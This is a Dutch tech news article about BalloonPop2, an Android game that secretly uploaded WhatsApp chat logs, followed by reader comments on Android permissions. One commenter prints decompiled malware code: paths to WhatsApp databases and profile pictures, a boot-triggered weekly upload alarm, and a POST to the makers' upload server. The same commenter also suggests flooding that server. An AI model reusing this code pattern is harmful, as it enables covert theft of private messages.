Android-game steelt en verkoopt Whatsapp-chatlogs

Een Android-game die in de Play Store stond stal WhatsApp-chatlogs van gebruikers en verkocht die. Een groot verschil met andere malware is dat gebruikers hun eigen chatlogs online kunnen nazoeken op de site van de makers.

De makers beweren daardoor dat ze slechts een backup-service voor WhatsApp hebben gemaakt, zegt beveiligingsonderzoeker Graham Cluley. Google denkt daar echter anders over en heeft de game uit de Play Store gehaald. De makers, die ook de site Whatsappcopy.com hebben, bieden het installatiebestand nu aan via de eigen site en vermoedelijk ook via alternatieve downloadwinkels.

In de game zelf, BalloonPop2, is geen aanwijzing te vinden dat de game de WhatsApp-chatlogs verzendt. Bij installatie vraagt de game toegang tot accounts en tot internet, maar het is onduidelijk waar het voor bedoeld is. Volgens Cluley misbruiken de makers de gegevens door ze te verkopen.

Bij een test van Tweakers bleek dat BalloonPop2 snel na de installatie gegevens begon te verzenden. De kopie van het chatlog blijkt echter nog niet zichtbaar op de site van Whatsappcopy. Omdat onduidelijk is wat de game nog meer voor gegevens verzendt of andere malware bevat, is het niet aan te raden om de game te installeren om het uit te proberen.

De game toont volgens Cluley aan dat WhatsApp moet gaan nadenken over het versleutelen van chatlogs op het toestel, omdat apps zonder veel moeite toegang hebben tot de privé-berichten van gebruikers.

Reacties (200)

soulrider 7 december 2013 18:09

Mbv zijn API-key voor com.bugsense is de ontwikkelaar altijd terug te vinden:

BugSenseHandler.initAndStartSession(this, "2c85abf5");

En blijkbaar is/was het de bedoeling om niet enkel de database te verzenden naar hun eigen server,
maar ook alle profiel foto's:

String str1 = Environment.getExternalStorageDirectory().getAbsolutePath() + "/WhatsApp/Databases/";
String str2 = Environment.getExternalStorageDirectory().getAbsolutePath() + "/WhatsApp/Profile Pictures/";

Dat ie onmiddellijk begint te uploaden wordt veroorzaakt door:
public class AutoStart
extends BroadcastReceiver
{
Alarm alarm = new Alarm();

public void onReceive(Context paramContext, Intent paramIntent)
{
if (paramIntent.getAction().equals("android.intent.action.BOOT_COMPLETED")) {
this.alarm.SetAlarm(paramContext);
}
}
}

public void SetAlarm(Context paramContext)
{
AlarmManager localAlarmManager = (AlarmManager)paramContext.getSystemService("alarm");
PendingIntent localPendingIntent = PendingIntent.getBroadcast(paramContext, 0, new Intent(paramContext, Alarm.class), 0);
localAlarmManager.setRepeating(1, System.currentTimeMillis(), 604800000L, localPendingIntent);
}

MAW: elke 168 uur gaat ie opnieuw je logs uploaden!

en euhm we kunnen even hun server gaan volspammen met random .zip-bestanden:

localHttpPost = new HttpPost("http://www.whatsappcopy.com/upload.php");
localByteArrayInputStream = new ByteArrayInputStream(arrayOfByte);
new InputStreamBody(localByteArrayInputStream, str4);

onbekend of die .php een max. file-grootte heeft, maar kijkend naar het amateurisme in hun code, lijkt me dat vrij straf. mogelijk zelfs een SQL-injectie?
("bobby; drop tabels; " die even wilt whatsapp'en?)

ps: het 'spelletje' dat men ziet is een html-bestand van amper 14kB, de volledige APK is er echter 626 kB (uitgepakt komt het neer op 3MB aan 'troep'-code + die 14kB -html + paar resources)

xnergy 7 december 2013 11:39

Als ik dit soort berichten lees ben ik toch blij met Cyanogenmod, waar nu standaard Privacy Guard in zit. Geeft me echt een prettig gevoel dat ik standaard toegang tot mijn gegevens kan blokkeren per app.

Verwijderd 7 december 2013 14:36

Ik zie dat men zich hier schuilt achter de permissies in Android, maar dat vind ik persoonlijk toch niet helemaal correct.

Allereerst zijn Android gebruikers getraind om permissies te negeren. Zelfs officiële applicaties van grote corporaties vragen om een uitgebreide lijst permissies, waarbij het totaal niet duidelijk is waar allemaal toegang voor wordt gegeven en waarom dat nodig is. Er zijn diverse apps die "find accounts on this device" gebruiken, waardoor de gebruiker niet het gevoel krijgt dat dit een krachtige permissie is.

Daarnaast heet de permissie die dit toestaat "find accounts on this device". Zelfs als techneut met diepgaande kennis van operating systems, kernels en security zou ik niet de link leggen dat “allows the app to get the list of accounts know by the phone” betekend dat deze applicatie alles op mijn telefoon mag inlezen. Het zou beter zijn om deze permissie te hernoemen naar "access data from other apps".

Als laatste, en ik moet zeggen dat ik al enige tijd geen Android heb gebruikt, mis ik de mogelijkheid om permissies individueel te weigeren. Bij iOS is dit beter geregeld, als een app toegang nodig heeft tot de microfoon zal er tijdens het draaien van app hier om worden gevraagd, en dit pas als het écht nodig is. Zelfde voor toegang tot locatiegegevens, het adresboek en foto's. En omdat dit allemaal met APIs gebeurd is hier simpelweg niet omheen te werken. En mocht je hier toch een manier op vinden, dan zal je applicatie niet worden gepubliceerd.

RetepV 8 december 2013 09:46

Het zou snel opgelost zijn als Android het zou toelaten om als gebruiker losse dingen aan of uit te kunnen zetten in de permissies. Ik krijg altijd een ontzettende lijst, en tussen de bijvoorbeeld 10 dingen zitten er 9 dingen die ik niet erg vindt, en 1 ding die ik niet wil. Maar ik kan alleen voor het hele pakket kiezen. Ik wil gewoon enkele dingen uit kunnen zetten.

Dat ik dan 'verminderde functionaliteit' heb kan me niet schelen. En als de app dan niet meer werkt door dat ene ding waar ik het niet mee eens ben, dan is er iets onbetrouwbaars aan de app.

Ook mag Google wat mij betreft nu eindelijk wel eens een personal firewall in Android inbouwen. Eentje waarbij ik kan zien wat elke app globaal zoal verstuurt. En eentje waarbij ik dus de volledige toegang van een app aan of uit kan zetten. Of gewoon weer individuele dingen aan of uit kan zetten.

Maar tja, Google wil dat niet.

Het is er namelijk wel, maar daar moet ik mijn telefoon eerst voor rooten. Wat mij betreft heeft Google geld zat om zelf zoiets te ontwikkelen. Of om een bedrijfje op te kopen die het al gemaakt heeft.

Met een goede user-interface, moet het ook best mogelijk zijn om hem voor iedereen begrijpbaar te maken.

In feite heeft Google geen goed excuus om geen personal firewall in te voeren. Android draait op connected devices. Een personal firewall vind ik vrij normaal voor apparaten die altijd met een netwerk verbonden zijn.

[Reactie gewijzigd door RetepV op 23 juli 2024 06:25]

maradesign 7 december 2013 11:35

De playstore is toch wel een punt waar ze strenger op moeten controleren. Als gebruiker kan je lezen wat voor permissies een app vraagt. Maar eigenlijk mag dit niet door de vingers van Google glijden. Ik vraag me af hoe dit precies gaat.

CAPSLOCK2000 @maradesign • 7 december 2013 11:47

Ze moeten de mogelijkheid geven om permissies te weigeren.
Nu wordt je als gebruiker voor het blok gezet. Je moet alle permissies waar een app om vraagt in een keer weggeven en het is vaak maar onduidelijk wat zo'n permissie precies doet en hoe een app dat gebruikt.

Je moet bij gratis commerciele apps natuurlijk van het slechtste uitgaan, maar mensen zijn erg sterk in te geloven wat ze goed uitkomt. Als jij die app graag wil hebben dan zul je geneigd zijn om te denken dat het allemaal wel meevalt en dat de makers van zo'n leuke app toch wel geen misbruik zullen maken van je gegevens.

"toegang tot contactlijst" en "toegang tot locatiegegevens" klinkt toch heel anders als "we sturen al je contacten mail dat jij vandaag bij de hoeren bent geweest" om even een (hopelijk) fictief extreem voorbeeld te gebruiken.

[Reactie gewijzigd door CAPSLOCK2000 op 23 juli 2024 06:25]

sc0va 8 december 2013 09:52

Ik gebruik Android MIUI en kan per app de permissies instellen. Aanrader!

FreshMaker @sc0va • 8 december 2013 11:08

Basic android, zonder echte theming, en Xprivacy ( icm Xposed )

Wel root nodig, maar als je dit soort dingen in de hand wil hebben, is root een kleine stap.
Xprivacy geeft alle apps weer, en houdt bij wat voor gegevens ze willen benaderen.
dmv een template kan je alles of bepaalde zaken weren.
Xprivacy stuurt dan wel gegevens door, maar maakt ze "random"

mijn gpslocatie op sommige site's was ineens Australie of Frankrijk, en mijn phone ID / IMEI aangepast.

* Standaard laat ik nieuwe apps blokkeren op oproepen, contacten, identificatie en accounts ( facebook, twitter en gmail )
Daarnaast is het goed gedocumenteerd, op tijd en datum wat een app wil lezen, zodat je dat alsnog kan blokkeren.

Patt_E 7 december 2013 12:00

Dit doet mij vrij weinig. Ik heb een gezond verstand en geef alleen toestemming aan apps die ik vertrouw. Een open systeem dat ook nog is het meest gebruikte mobiele platform wereldwijd is komt nou eenmaal met risico's. Het open systeem is ook de reden waarom ik geen iOS of Windows Phone wil hebben.
Als ik 600+ euro betaal dan wil ik ook zo veel mogelijk controle.

Erwin1967 @Patt_E • 7 december 2013 13:45

Ik vind het erg goed van jou dat je een onderscheid kunt maken tussen betrouwbare en onbetrouwbare apps. Of er draaien heel weinig apps bij jou of je weet kennelijk niet zo goed wat apps allemaal doen onder water. Je schrikt wat bv Google Now allemaal van je vastlegt.... Het is een soort uitgebreide runkeeper die permanent aanstaat, en dat kun je zelf (en waarschijnlijk dus ook anderen) nakijken op de google website. Zeer waarschijnlijk wordt nog veel meer in kaart gebracht.
Zelf gebruik ik een klein programma voor het bijhouden van o.a. wachtwoorden. Dit programma heb ik expliciet gekozen omdat hij geen recht/toegang heeft op het internet en dus mijn informatie niet met anderen kan delen. Ik heb een stuk of 5 moeten bekijken voordat ik deze vond die aan mijn eisen voldeed. Controle is dus mogelijk maar heeft zijn beperkingen en kost veel tijd...

Grappig ik zag net http://www.androidplanet....d-app-gebruikerslocaties/. Zelfs een zaklamp app is niet meer te vertrouwen!

[Reactie gewijzigd door Erwin1967 op 23 juli 2024 06:25]

Dannisi 7 december 2013 11:50

De game toont volgens Cluley aan dat WhatsApp moet gaan nadenken over het versleutelen van chatlogs op het toestel, omdat apps zonder veel moeite toegang hebben tot de privé-berichten van gebruikers.

De chatlogs zijn versleuteld, maar worden gebackupt naar de SD kaart. En op Android kan je geen rechten geven op bepaalde delen van de SD, het is alles of niks. De backup logs decrypten is trouwens ook geen probleem, daar zijn genoeg tools voor.
Valt me mee dat dit het eerste is dat we (ik) er van horen. Heel veel apps hebben toegang tot de SD kaart om cache weg te schrijven, daarmee hebben ze ook meteen rechten tot alle fotos en andere dingen die daar op staan.

Amiga3000 7 december 2013 12:48

Als we zo doorgaan heb je een management interface nodig om alle rechten op het filesystem zelf te kunnen zetten.

Verwijderd 7 december 2013 13:52

Android-game steelt en verkoopt Whatsapp-chatlogs

so what? op je pc kunnen ook genoeg malware en virussen voorkomen, toch zitten we niet met z'n allen achter een ios computer geloof ik.

het komt erop neer dat mensen zonder al teveel common sense (heel zacht uitgedrukt) onbetrouwbare apps/files openen en daarmee hun eigen privacy riskeren. mensen die beter kunnen nadenken gebeurt dat niet.

kortom, breaking on-nieuws in android land om weer eens aan te tonen dat "android onveilig is". net zoals met de zaklamp app, elke android telefoon die ik heb gezien had al een standaard zaklamp app geïnstalleerd, waarom je nog een aparte app nodig hebt die niet eens per se betrouwbaar of populair is moet downloaden is mij een raadsel.

Op dit item kan niet meer gereageerd worden.

Android-game steelt en verkoopt Whatsapp-chatlogs

Lees meer

Reacties (200)

Sorteer op:

Weergave: